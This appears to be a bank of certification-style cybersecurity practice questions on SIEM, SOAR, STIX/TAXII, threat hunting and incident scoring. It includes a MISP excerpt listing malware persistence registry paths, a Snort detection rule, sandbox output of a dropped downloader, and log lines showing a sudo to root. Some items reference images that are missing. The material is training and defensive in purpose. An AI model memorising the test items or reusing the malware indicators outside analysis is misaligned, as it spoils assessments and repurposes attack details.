Run memctl from the command line
Which one of the following components is not normally part of an endpoint security suite?
IPS
Firewall
Antimalware
VPN
Joan is working as a security consultant to a company that runs a critical web application. She discovered that the application has a serious SQL injection vulnerability but the company cannot take the system offline during the two weeks required to revise the code. Which one of the following technologies would serve as the best compensating control?
IPS
WAF
Vulnerability scanning
Encryption
Questions 133–136 refer to the following scenario and image.
Bill is reviewing the authentication logs for a Linux system that he operates and encounters the following log entries:
Aug 30 09:46:54 ip-172-30-0-62 sshd[3051]: Accepted publickey for ec2-user from 10.174.238.88 port 57478 ssh2: RSA e5:f5:c1:46:bb:49:a1:43:da:9d:50:c5:37:bd:79:22
Aug 30 09:46:54 ip-172-30-0-62 ssh[3051]: pam_unix[sshd:session]: session opened for user ec2-user by (uid=0)
Aug 30 09:48:06 ip-172-30-0-62 sudo: ec2-user : TTY=ps/0 ; PWD=/home/ec2-user ; USER=root; COMMAND=/bin/bash
What is the IP address of the system where the user was logged in when they initiated the connection?
172.30.0.62
62.0.30.172
10.174.238.88
9.48.6.0
What service did the user use to connect to the server?
HTTPS
PTS
SSH
Telnet
What authentication technique did the user use to connect to the server?
Password
PKI
Token
Biometric
What account did the individual use to connect to the server?
root
ec2-user
bash
pam_unix
Lucca wants to identify systems that may have been compromised and are being used for data exfiltration. Which of the following technologies should he put into place to capture data that he can analyze using his SIEM to find this behavior?
A firewall
A NetFlow collector
A honeypot
A BGP monitor
Fred believes that the malware he is tracking uses a fast flux network and multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here?
Fiona is considering a scenario in which components that her organization uses in their software that come from public GitHub repositories are trojaned. What should she do first to form the basis of her proactive threat hunting effort?
Search for examples of a similar scenario
Validate the software currently in use from the repositories
Form a hypothesis
Analyze the tools available for this type of attack
Jason is profiling a threat actor using STIX 2.0 and can choose among the following labels.
Individual
Club
Contest
Team
Organization
Government
What is he identifying?
Affiliation
Attack resource level
Certification level
Threat name
Tracy has reviewed the CrowdStrike writeup for an APT group known as HELIX KITTEN, which notes that the group is known for creating “thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel.” What types of defenses are most likely to help if she identifies HELIX KITTEN as a threat actor of concern for her organization?
DKIM
An awareness campaign
Blocking all email from unknown senders
SPF
Micah wants to use the data he has collected to help with his threat hunting practice. What type of approach is best suited to using large volumes of log and analytical data?
Hypothesis-driven investigation
Investigation based on indicators of compromise
Investigation based on indications of attack
AI/ML-based investigation
Dani wants to analyze a malware package that calls home. What should she consider before allowing the malware to “phone home”?
Whether the malware may change behavior
Whether the host IP or subnet may become a target for further attacks
Attacks may be staged by the malware against other hosts
All of the above
After conducting an nmap scan of his network from outside of his network, James notes that a large number of devices are showing three TCP ports open on public IP addresses: 9100, 515, and 631. What type of devices has he found, and how could he reduce his organization's attack surface?
As part of her threat-hunting activities, Olivia bundles her critical assets into groups. Why would she choose to do this?
To increase complexity of analysis
To leverage similarity of threat profiles
To mix sensitivity levels
To provide a consistent baseline for threats
Unusual outbound network traffic, abnormal HTML response sizes, DNS request anomalies, and mismatched ports for application traffic are all examples of what?
Threat hunting
SCAP
Indicators of compromise
Continuous threat feeds
Alex is working to understand his organization's attack surface. Services, input fields in a web application, and communication protocols are all examples of what component of an attack surface evaluation?
Threats
Attack vectors
Risks
Surface tension
Jiang wants to combine TAXII feeds with his own threat analysis information. What standard can he use to ensure that his data works across multiple systems without needing to be converted?
SAML
XHTML
STIX
YELLOW
Naomi wants to improve the detection capabilities for her security environment. A major concern for her company is detection of insider threats. What type of technology can she deploy to help with this type of proactive threat detection?
IDS
UEBA
SOAR
SIEM
Ling wants to use her SOAR platform to handle phishing attacks more effectively. What elements of potential phishing emails should she collect as part of her automation and workflow process to triage and assign severity indicators?
Subject lines
Email sender addresses
Attachments
All of the above
Isaac wants to write a script to query the BotScout forum bot blacklisting service. What data should he use to query the service based on the following image?
Email address
Name
IP address
Date
Syslog, APIs, email, STIX/TAXII, and database connections are all examples of what for a SOAR?
IOCs
Methods of data ingestion
SCAP connections
Attack vectors
Talos provides the BASS automated signature synthesizer tool due to modern challenges with malware. What major problem drives increasing use of automated malware signature creation tools?
More complex malware
Huge numbers of new malware signatures
Hash-based signatures take too long to create manually
Sandboxing is no longer effective
Yaan uses multiple data sources in his security environment, adding contextual information about users from Active Directory, geolocation data, multiple threat data feeds, as well as information from other sources to improve his understanding of the security environment. What term describes this process?
Data drift
Threat collection
Threat centralization
Data enrichment
When a DLP system is monitoring copy/paste, data displayed on a screen or captured from the screen, printing, and similar activities, what term describes the data's state?
Data at rest
Data in motion
Data in use
Data execution
Mila is reviewing feed data from the MISP open source threat intelligence tool and sees the following entry:
"Unit 42 has discovered a new malware family we've named "Reaver" with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.",
"Tag": [{"colour": "#00223b", "exportable": true, "name": "osint:source-type="blog-post""}],
"disable_correlation": false, "object_relation": null, "type": "comment"},
{"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-1c7c-4353-8523-440b950d210f", "timestamp": "1510922426", "to_ids": false, "value": "%COMMONPROGRAMFILES%\services\", "disable_correlation": false, "object_relation": null, "type": "regkey"},
{"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-808c-4833-b739-43bf950d210f", "timestamp": "1510922426", "to_ids": false, "value": "%APPDATA%\microsoft\mmc\", "disable_correlation": false, "object_relation": null, "type": "regkey"},
{"comment": "", "category": "Persistence mechanism", "uuid": "5a0a9d47-91e0-4fea-8a8d-48ce950d210f", "timestamp": "1510922426", "to_ids": false, "value": "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Startup"
How does the Reaver malware maintain persistence?
A blog post
Inserts itself into the Registry
Installs itself as a runonce key
Requests user permission to start up
Isaac's organization has deployed a security tool that learns how network users typically behave and then searches for differences that match attack behaviors. What type of system can automatically analyze this data to build detection capability like this?
Signature-based analysis
A Babbage machine
Machine learning
Artificial network analysis
What is the advantage of a SOAR system over a traditional SIEM system?
SOAR systems are less complex to manage.
SOAR systems handle large log volumes better using machine learning.
SOAR systems integrate a wider range of internal and external systems.
SOAR logs are transmitted only over secure protocols.
What protocol does the U.S. government use to represent the data stored in the National Vulnerability Database?
STIX
CVSS
SCAP
CPE
Brian is on the development team that his company has tasked with maintaining their organization's web application. He and his coworkers check code in multiple times a day, and the code is then verified and tested automatically. What is this practice called?
Continuous delivery
Repo-stuffing
Continuous integration
Time coding
Fiona has continued her threat hunting efforts, and has formed a number of hypotheses. What key issue should she consider when she reviews them?
The number of hypotheses
Her own natural biases
Whether they are strategic or operational
If the attackers know about them
Mila is categorizing an actor using STIX 2.0 and wants to describe an actor that is responsible for APT-level attacks. What STIX threat actor sophistication level best fits this type of actor?
Intermediate
Advanced
Expert
Strategic
Christina wants to describe a threat actor's motivations, abilities, capabilities, and responses. What open standard markup language can she use to do this?
TAXII
OAuth
STIX
STONES
Alaina adds the openphish URL list to her SOAR tool and sees the following entries:
What action should she take based on phishing URLs like these?
Block the IP address at her border firewall
Monitor for the IP address using her IDS
Delete emails with the URL from inbound email
Nothing, as these have not been confirmed
Rowan wants to block drive-by-downloads and bot command and control channels while redirecting potentially impacted systems to a warning message. What should she implement to do this?
A DNS sinkhole
A WAF
An IDS
A UEBA
What type of malware technique hides its command and control servers within a large number of possible suspects?
Polymorphic domain malware
Domain generation algorithms
Hostname multipliers
ICA spoofers
Alex configured a Snort rule that reads:
alert tcp any any -> any 22 (msg:"Detected!"; sid:10000004;)
What will Alex's rule typically detect?
FTP traffic
Telnet traffic
SMTP traffic
SSH traffic
Michelle wants to implement a static analysis security testing (SAST) tool into her continuous integration pipeline. What challenge could she run into if her organization uses multiple programming languages for components of their application stack that will be tested?
They will have to ensure the scanner works with all of the languages chosen.
They will have to compile all of the code to the same binary output language.
They will have to run the applications in a sandbox.
They will have to run the applications under the same execution environment.
Nina configures her IPS to detect and stop attacks based on signatures. What type of attacks will she block?
New attacks based on behavior
Previously documented attacks that match the signatures
Previously documented attacks and similar attacks based on the signatures
All of the above
Nathan wants to determine which systems are sending the most traffic on his network. What low overhead data gathering methodology can he use to view traffic sources, destinations, and quantities?
A network sniffer to view all traffic
Implement NetFlow
Implement SDWAN
Implement a network tap
Use the following table and rating information for questions 171–173.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) uses a 1–100 scale for incident prioritization, with weight assigned to each of a number of categories. The functional impact score is weighted in their demonstration as follows:
Functional impact                               Rating
No impact                                       0
No impact to services                           20
Minimal impact to noncritical services          35
Minimal impact to critical services             40
Significant impact to noncritical services      50
Denial of noncritical services                  60
Significant impact to critical services         70
Denial of critical services or loss of control  100
Nathan discovers a malware package on an end user workstation. What rating should he give this if he is considering organization impact based on the table shown?
No impact
No impact to services
Denial of noncritical services
Denial of critical services or loss of control
Nathan's organization uses a software-as-a-service (SaaS) tool to manage their customer mailing lists, which they use to inform customers of upcoming sales a week in advance. The organization's primary line of business software continues to function and merchandise can be sold. Due to a service outage, they are unable to add new customers to the list for a full business day. How should Nathan rate this local impact issue during the outage?
Minimal impact to noncritical services
Minimal impact to critical services
Significant impact to noncritical services
Denial of noncritical services
During an investigation into a compromised system, Nathan discovers signs of an advanced persistent threat (APT) resident in his organization's administrative systems. How should he classify this threat?
Significant impact to noncritical services
Denial of noncritical services
Significant impact to critical services
Denial of critical services or loss of control
Adam is reviewing a Wireshark packet capture in order to perform protocol analysis, and he notes the following data in the Wireshark protocol hierarchy statistics. What percentage of traffic is most likely encrypted web traffic?
85.9 percent
1.7 percent
20.3 percent
1.9 percent
Annie is reviewing a packet capture that she believes includes the download of malware. What host should she investigate further as the source of the malware based on the activity shown in the following image from her packet analysis efforts?
172.17.8.8
49.51.172.56
172.17.8.172
56.172.51.49
While reviewing IPS logs, Annie finds the following entry:
ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)
What should her next action be?
Run an antimalware scan of the system associated with the detection
Block inbound traffic from the external system associated with the infection
Block outbound traffic to the external system associated with the infection
Nothing, as this is a false positive due to an expired certificate
Steve uploads a malware sample to an analysis tool and receives the following messages:
>Executable file was dropped: C:\Logs\mffcae1.exe
>Child process was created, parent C:\Windows\system32\cmd.exe
>mffcae1.exe connects to unusual port
>File downloaded: cx99.exe
If he wanted to observe the download behavior himself, what is the best tool to capture detailed information about what occurs?
An antimalware tool
Wireshark
An IPS
Network flows
Abdul is analyzing proxy logs from servers that run in his organization and notices two proxy log servers have entries for similar activities that always occur one hour apart from each other. Both proxy servers are in the same data center, and the activity is part of a normal evening process that runs at 7 p.m. One proxy server records the data at 7 p.m., one records the entry at 6 p.m. What issue has Abdul likely encountered?
A malware infection emulating a legitimate process
An incorrect time zone setting
A flaw in the automation script
A log entry error
Eric is performing threat intelligence work and wants to characterize a threat actor that his organization has identified. The threat actor is similar to the group known as Anonymous and has targeted organizations for political reasons in the past. How should he characterize this threat actor?
Unwitting insiders
Unknown
APT
Hacktivist
Melissa is using the US-CERT's scale to measure the impact of the location of observed activity by a threat actor. Which of the following should be the highest rated threat activity location?
Critical system DMZ
Business network
Business DMZ
Safety systems
Gavin wants to deploy a NAC solution. Which of the following is a validation technique that an agent-based NAC system can use?
Current operating system patch status
Network VLAN or security zone assignment
Antimalware or antivirus update status
All of the above
What information is used to determine which systems can connect to a network port protected by port security?
IP address
Hostname
MAC address
UserID and password
What do DLP systems use to classify data and to ensure that it remains protected?
Data signatures
Business rules
Data egress filters
Data at rest
Jana wants to configure her IPS to block a recently discovered denial of service condition that impacts her Apache web server. What is the most effective method of implementing this quickly if her IPS is provided by a commercial vendor?
Research the denial-of-service attack and write a custom detection rule
Block all traffic to the web servers until a patch is installed
Configure a signature-based rule using a signature provided by the vendor
Research the denial-of-service attack, and then use the first released exploit proof of concept to build a signature to detect the attack
Zhi wants to capture network flows from her network as shown in the following image. Where should she collect network flows to balance maximum visibility without collecting unnecessary information?
Point A
Point B
Point C
Point D
Benicio wants to implement a tool for all the workstations and laptops in his company that can combine behavioral detection of indicators of attack based on current threat intelligence with real-time visibility into the systems. What sort of tool should he select?
An IPS
An EDR
A CRM
A UEBA
Benita needs to change the permissions on a file named public_secrets.txt stored on a Linux server, and she wants to make the file readable to all users on the system.
The file is currently set to:
rwx------
What command can she use to do this without providing the ability to execute or write to the file?
chmod 777 public_secrets.txt
chmod 744 public_secrets.txt
chmod public_secrets.txt 777
chmod 447 public_secrets.txt
Eric wants to analyze a malware binary in the safest way possible. Which of the following methods has the least likelihood of allowing the malware to cause problems?
Run the malware on an isolated VM
Perform dynamic analysis of the malware in a sandbox
Perform static analysis of the malware
Run the malware in a container service
Tom wants to improve his detection capabilities for his software-as-a-service (SaaS) environment. What technology is best suited to give him a view of usage, data flows, and other details for cloud environments?
EDR
CASB
IDS
SIEM
Chuck wants to identify a tool to provision servers, create virtual servers and assign storage to them, and configure networking and security policies. What type of tool should he consider?
Scripting
APIs
Workflow orchestration
SCAP
What advantages does TAXII provide for threat feed combination?
Interoperability between security tools
Confidentiality and integrity of data
Greater speed for sharing of data
All of the above
A production environment with “blue” and “green” deployments in parallel, with one live and one updated to the newest code, is an example of what type of pipeline?
Continuous integration
Waterfall
Spiral
Continuous delivery
Joseph's antimalware package detects new malware by examining code for suspicious properties. What type of technique is this an example of?
Fagan code inspection
Heuristic analysis
Machine learning
Artificial intelligence
Isaac wants to identify known good behavior patterns for all of the applications that his organization uses. If he doesn't want to have a staff member review logs and behaviors for every application in every scenario it is run, what type of analytical tool would best be suited to dealing with this volume and type of data?
Trend analysis
Machine learning
Manual analysis
Endpoint analysis
Juan wants to audit filesystem activity in Windows and configures Windows filesystem auditing. What setting can he set to know if a file was changed or not using Windows file auditing?
Set Detect Change
Set Validate File Versions
Set Audit Modifications
None of the above
Naomi wants to analyze URLs found in her passive DNS monitoring logs to find DGA (domain generation algorithm) generated command and control links. What techniques are most likely to be useful for this?
WHOIS lookups and NXDOMAIN queries of suspect URLs
Querying URL whitelists
DNS probes of command-and-control networks
Natural language analysis of domain names
Derek's organization has been working to recover from a recent malware infection that caused outages across the organization during an important part of their business cycle. In order to properly triage, what should Derek pay the most attention to first?
The immediate impact on operations so that his team can restore functionality
The total impact of the event so that his team can provide an accurate final report
The immediate impact on operations so that his team can identify the likely threat actor
The total impact of the event so that his team can build a new threat model for future use
Kathleen wants to ensure that her team of security analysts sees important information about the security status of her organization whenever they log in to the SIEM. What part of a SIEM is designed to provide at-a-glance status information?
The reporting engine
Email reports
The dashboard
The ruleset
Lucca is reviewing bash command history logs on a system that he suspects may have been used as part of a breach. He discovers the following grep command run inside of the /users directory by an administrative user. What will the command find?
grep -r "sudo" /home/users/ | grep "bash.log"
All occurrences of the sudo command on the system
All occurrences of root logins by users
All occurrences of the sudo command in bash log files in user home directories
All lines that do not contain the word sudo or bash.log in user directories
Munju wants to test her organization's email for malicious payloads. What type of tool should she select to perform this action?